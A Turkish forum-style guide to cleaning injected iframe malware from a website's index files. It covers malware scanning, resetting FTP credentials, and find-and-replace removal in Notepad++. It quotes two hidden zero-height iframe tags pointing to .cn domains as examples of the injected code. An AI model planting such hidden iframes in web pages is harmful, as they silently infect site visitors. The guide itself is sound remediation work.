Iframe'ler bir siteye bulaşınca, tüm index benzeri dosyaları haşat ediyor ve
siteyi ziyaret eden kullanıcının bilgisayarına da bulaşır. Ayrıca sitenize
bağlandığınız ftp programında şifre ve kullanıcı adınız kayıtlıysa,
programı kapattığınıza bile bulaşma işlemi devam eder. Temizlemek için şu
adımları izleyebilirsiniz:
0)Notepad++ programını indirin.
(Yüklemek için:
http://downloads.sourceforge.net/pro....Installer.exe)
1)Bilgisayarınızaa
sağlam bir virüs programı ve malware cleaner yükleyip tarama yapın.
Nod32
ve Norman Malware Cleaner iyi gider. Ücretsiz virüs programı kullanmak
istiyorsanız, sadece tek bir programla tarama yapmak yerine, iki üç
programla tarama yapmanızı tavsiye ederim. Hepsini tek tek yükleyip,
tarama yapıp kaldırman ız şartıyla tabii ki (: Virüs programı ve Norman
Malware Cleaner(mükemmel bir temizleme aracı)'ı yüklediyseniz, virüs programından güncelleme yapıp internet bağlantınızı kesin.
NOT:NORMAN İÇİN İNDİRME ADRESİ:[
http://normanasa.vo.llnwd.net/o29/pu...e_Cleaner.exe]
2)Bilgisayarınız temizlendikten
sonra, Ftp programına girip önbelleğinizdeki kayıtlı şifreyi falan
temizleyin. (kestiğiniz bağlantıyı yamalamayı unutmayın tabi
)
3)Sitenin yönetim paneline girin. (genelde
http://www.siteadi.com/cpanelşeklindedir)
Burada ftp şifrenizi bayağı karışık bir şeye çevirin ve içinde mutlaka
sembol olsun birkaç tane. Aynı zamanda büyük küçük harfe duyarlı olması
daha garantili olur.
4)Dosya adında index kelimesi geçen tüm dosyaları
bilgisayarınıza indirin. [Ayrıca erhansey'in dediği diğer dosyaları da indir önlem olarak

]
Bu dosyaların iframe bulaşmadan önceki bir tarihte
alınmış yedekleri varsa, direkt olarak değiştirip kurtulabilirsiniz
virüsten.
Eğer yoksa:
indirdiğiniz tüm dosyaları Notepad++
programıyla açıp CTRL+F kombinasyonunu kullanarak alttaki tarza benzer ifadeleri
bulun. Bul/Değiştir/Dosyada bul sekmelerinden "Değiştir"i seçerek açılan
pencerede de "Tümünü Değiştir (Belge)" butonuna basarak,boşluk
karakteriyle değiştirin aşağıdaki ifadeleri...
"iframe src="http://www.a24q.cn/index.htm" width="100" height="0" frameborder="0">
iframe src="http://www.k38n.cn/xl.htm" width="100" height="0" frameborder="0">"
İlla bunlar olacak değil ama genelde index dosyalarının en altında yazar. Herhangi birini kopyalayıp o iframe'yi aratın dosyalarda ve " "
(boşluk/space)karakteriyle değiştirin hepsini.
5)Son olarak iframesiz index dosyalarını atın tekrardan ftp'ye...
Eğer bunlar işe yaramıyorsa, tüm index dosyalarını taramamışsınızdır ya da taradığınız dosyalarda hala bazı iframeler vardır. İlla ki "ben aradım, hepsini sildim ama hala virüs uyarısı alıyorum" diyorsanız, kelime-i şehadet getirmesini söyleyin siteye